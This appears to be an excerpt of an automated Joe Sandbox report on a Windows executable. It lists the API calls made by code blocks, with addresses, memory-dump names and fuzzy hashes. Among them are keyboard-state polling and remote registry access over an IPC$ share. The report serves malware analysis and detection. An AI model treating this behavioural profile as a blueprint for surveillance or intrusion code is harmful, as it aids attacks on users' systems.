                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5ad745fddc7de5a9e05b059a4e2e0316d9a6556fe84979deb676abc7c9ee3ce0
                                                                                                                                                                                                                                                                            • Instruction ID: 40a95cd5cee51b934042f51772661ff0e6c4183115e3dba812f0a1b39def4eab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ad745fddc7de5a9e05b059a4e2e0316d9a6556fe84979deb676abc7c9ee3ce0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A55118789047852AFB35D7618810BAABFB48F11381F084699CDD2171C2DA649FCCCBAB
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00C56649
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C56662
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C566C0
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00C566D0
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C566E2
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C56736
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C56744
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C56756
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C56798
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C567AB
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C567C1
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C567CE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                            • Opcode ID: 40ccf805d5bc3f11a8beed77c3de7662c41d673231f971af32a85f4dab0ae1b2
                                                                                                                                                                                                                                                                            • Instruction ID: 1d14b8f05a2eb2920b864a26ae779403aeadf4f5c357f94ece965c57330df27d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40ccf805d5bc3f11a8beed77c3de7662c41d673231f971af32a85f4dab0ae1b2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66512F75A00209AFDF18CF68CD85BAEBBB5FB48315F508129F91AE7290D770AE44CB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF1488,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00BF1865
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00BF1521
                                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00BF145A,00000000,?), ref: 00BF15BB
                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00C329B4
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00C329E2
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BF145A,00000000,?), ref: 00C329F9
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BF145A,00000000), ref: 00C32A15
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C32A27
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 641708696-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7e4e43c995e6855d5251c8a3c4efd51e9edb5b6273677f6bf0ec5a416f000f91
                                                                                                                                                                                                                                                                            • Instruction ID: 8d93b2034c2d943ecdb1330e170faba3ac3fb30373cd01c54801bd2b6f6bb57a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e4e43c995e6855d5251c8a3c4efd51e9edb5b6273677f6bf0ec5a416f000f91
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13618931511719DFDB399F18D988B3AB7F1FB90322F108958E14397AA0C771A989EF44
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF2234: GetWindowLongW.USER32(?,000000EB), ref: 00BF2242
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00BF2152
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                                                                                                                            • Opcode ID: 406dedb43b1d746930db566ddf8cf52f97156ebe181601e4062e2647c08e020a
                                                                                                                                                                                                                                                                            • Instruction ID: 99d972fa3bb40d7f386dd100dbf26773f2c1567e40744c19219ee05950a8ec95
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 406dedb43b1d746930db566ddf8cf52f97156ebe181601e4062e2647c08e020a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD41A035100648AFDB205F28DC88BBE37B6EB42735F144695FBA29B2E1C7319E46DB14
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00C40D31,00000001,0000138C,00000001,00000000,00000001,?,00C6EEAE,00CC2430), ref: 00C5A091
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C40D31,00000001), ref: 00C5A09A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C40D31,00000001,0000138C,00000001,00000000,00000001,?,00C6EEAE,00CC2430,?), ref: 00C5A0BC
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C40D31,00000001), ref: 00C5A0BF
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5A1E0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                            • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                            • Opcode ID: 8ea8c1a52826d9ffc5a85040ae2beee9c621a1f5f14aeed49f7fd2857c3d0045
                                                                                                                                                                                                                                                                            • Instruction ID: d5df3594bc1f6050aaeba206f9b5449f7781bfff7500a05d4f8b62de18549631
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ea8c1a52826d9ffc5a85040ae2beee9c621a1f5f14aeed49f7fd2857c3d0045
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D411C7280010DAACB04EBE1DD46EEEB7B8AF54301F5001A5BA05B20A2EB656F4DDB65
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C51093
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C510AF
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C510CB
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C510F5
                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C5111D
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C51128
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5112D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                            • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                            • Opcode ID: 0e61ccf98309b01aba943b86f7352454bf23e44826cca21fd792237c442d718d
                                                                                                                                                                                                                                                                            • Instruction ID: 305520e1583ca489f2b9e260163b7de890988bdf1818bef0070d1b362988215d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e61ccf98309b01aba943b86f7352454bf23e44826cca21fd792237c442d718d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0541FA76C1022DABCF15EFA4DC45EEEB7B8BF14750F044169EA11A31A1EB319E48CB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C84AD9
                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00C84AE0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C84AF3
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C84AFB
                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C84B06
                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00C84B10
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00C84B1A
                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00C84B30
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00C84B3C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                            • Opcode ID: 0e43e531eb28f84f4f57846805f5cd3328fe778576317e173e1407236098c0ab
                                                                                                                                                                                                                                                                            • Instruction ID: fbd9b3c4b50325c91481a374572b2822617307f41256824b43abf74f48ef8f01
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e43e531eb28f84f4f57846805f5cd3328fe778576317e173e1407236098c0ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01314D31100219ABDF11AFA4DC08FEE3BA9FF09769F110215FA26961E0C735D950EB58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C746B9
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C746E7
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C746F1
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7478A
                                                                                                                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00C7480E
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C74932
                                                                                                                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C7496B
                                                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,00C90B64,?), ref: 00C7498A
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00C7499D
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C74A21
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C74A35
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea8c24af30c20bf4561a509527d8efeef564e7b62e726e14fd1106307ab35c18
                                                                                                                                                                                                                                                                            • Instruction ID: 238290f58fed0231b22afb2d5ed2f016d342960bb4f8833cccaf280766733271
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea8c24af30c20bf4561a509527d8efeef564e7b62e726e14fd1106307ab35c18
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BC133716042059FC704DF68C88492BBBE9FF89748F10895DF99ADB260DB31ED45CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C68538
                                                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C685D4
                                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00C685E8
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00C90CD4,00000000,00000001,00CB7E8C,?), ref: 00C68634
                                                                                                                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C686B9
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00C68711
                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00C6879C
                                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C687BF
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C687C6
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C6881B
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00C68821
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4038958a8eb53c7e551955907aa2d57b94b347dad9b570f60b02228e50be9898
                                                                                                                                                                                                                                                                            • Instruction ID: 0a80e6110871f0aed3843fd0440adc2314c4d370cd4ff45a3f7f69cc47bd2d1b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4038958a8eb53c7e551955907aa2d57b94b347dad9b570f60b02228e50be9898
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2C1FB75A00119AFDB14DFA4C888DAEBBF5FF48304B148599F51ADB2A1DB30EE45CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C5039F
                                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00C503F8
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C5040A
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C5042A
                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00C5047D
                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C50491
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C504A6
                                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00C504B3
                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C504BC
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C504CE
                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C504D9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9c451886c4b4c00896337ac3555b2e6a49be36963c62c15128e12baf5a64f9f1
                                                                                                                                                                                                                                                                            • Instruction ID: 13a4a82716f45e08d2ffb164354a1b218464b8368fc8673284d09188808ffed3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c451886c4b4c00896337ac3555b2e6a49be36963c62c15128e12baf5a64f9f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16416375A00219DFCF10DFA4D844AAEBBB9FF48355F108069F916E7261C730A985CF94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5A65D
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C5A6DE
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C5A6F9
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C5A713
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C5A728
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C5A740
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C5A752
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C5A76A
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C5A77C
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C5A794
                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C5A7A6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
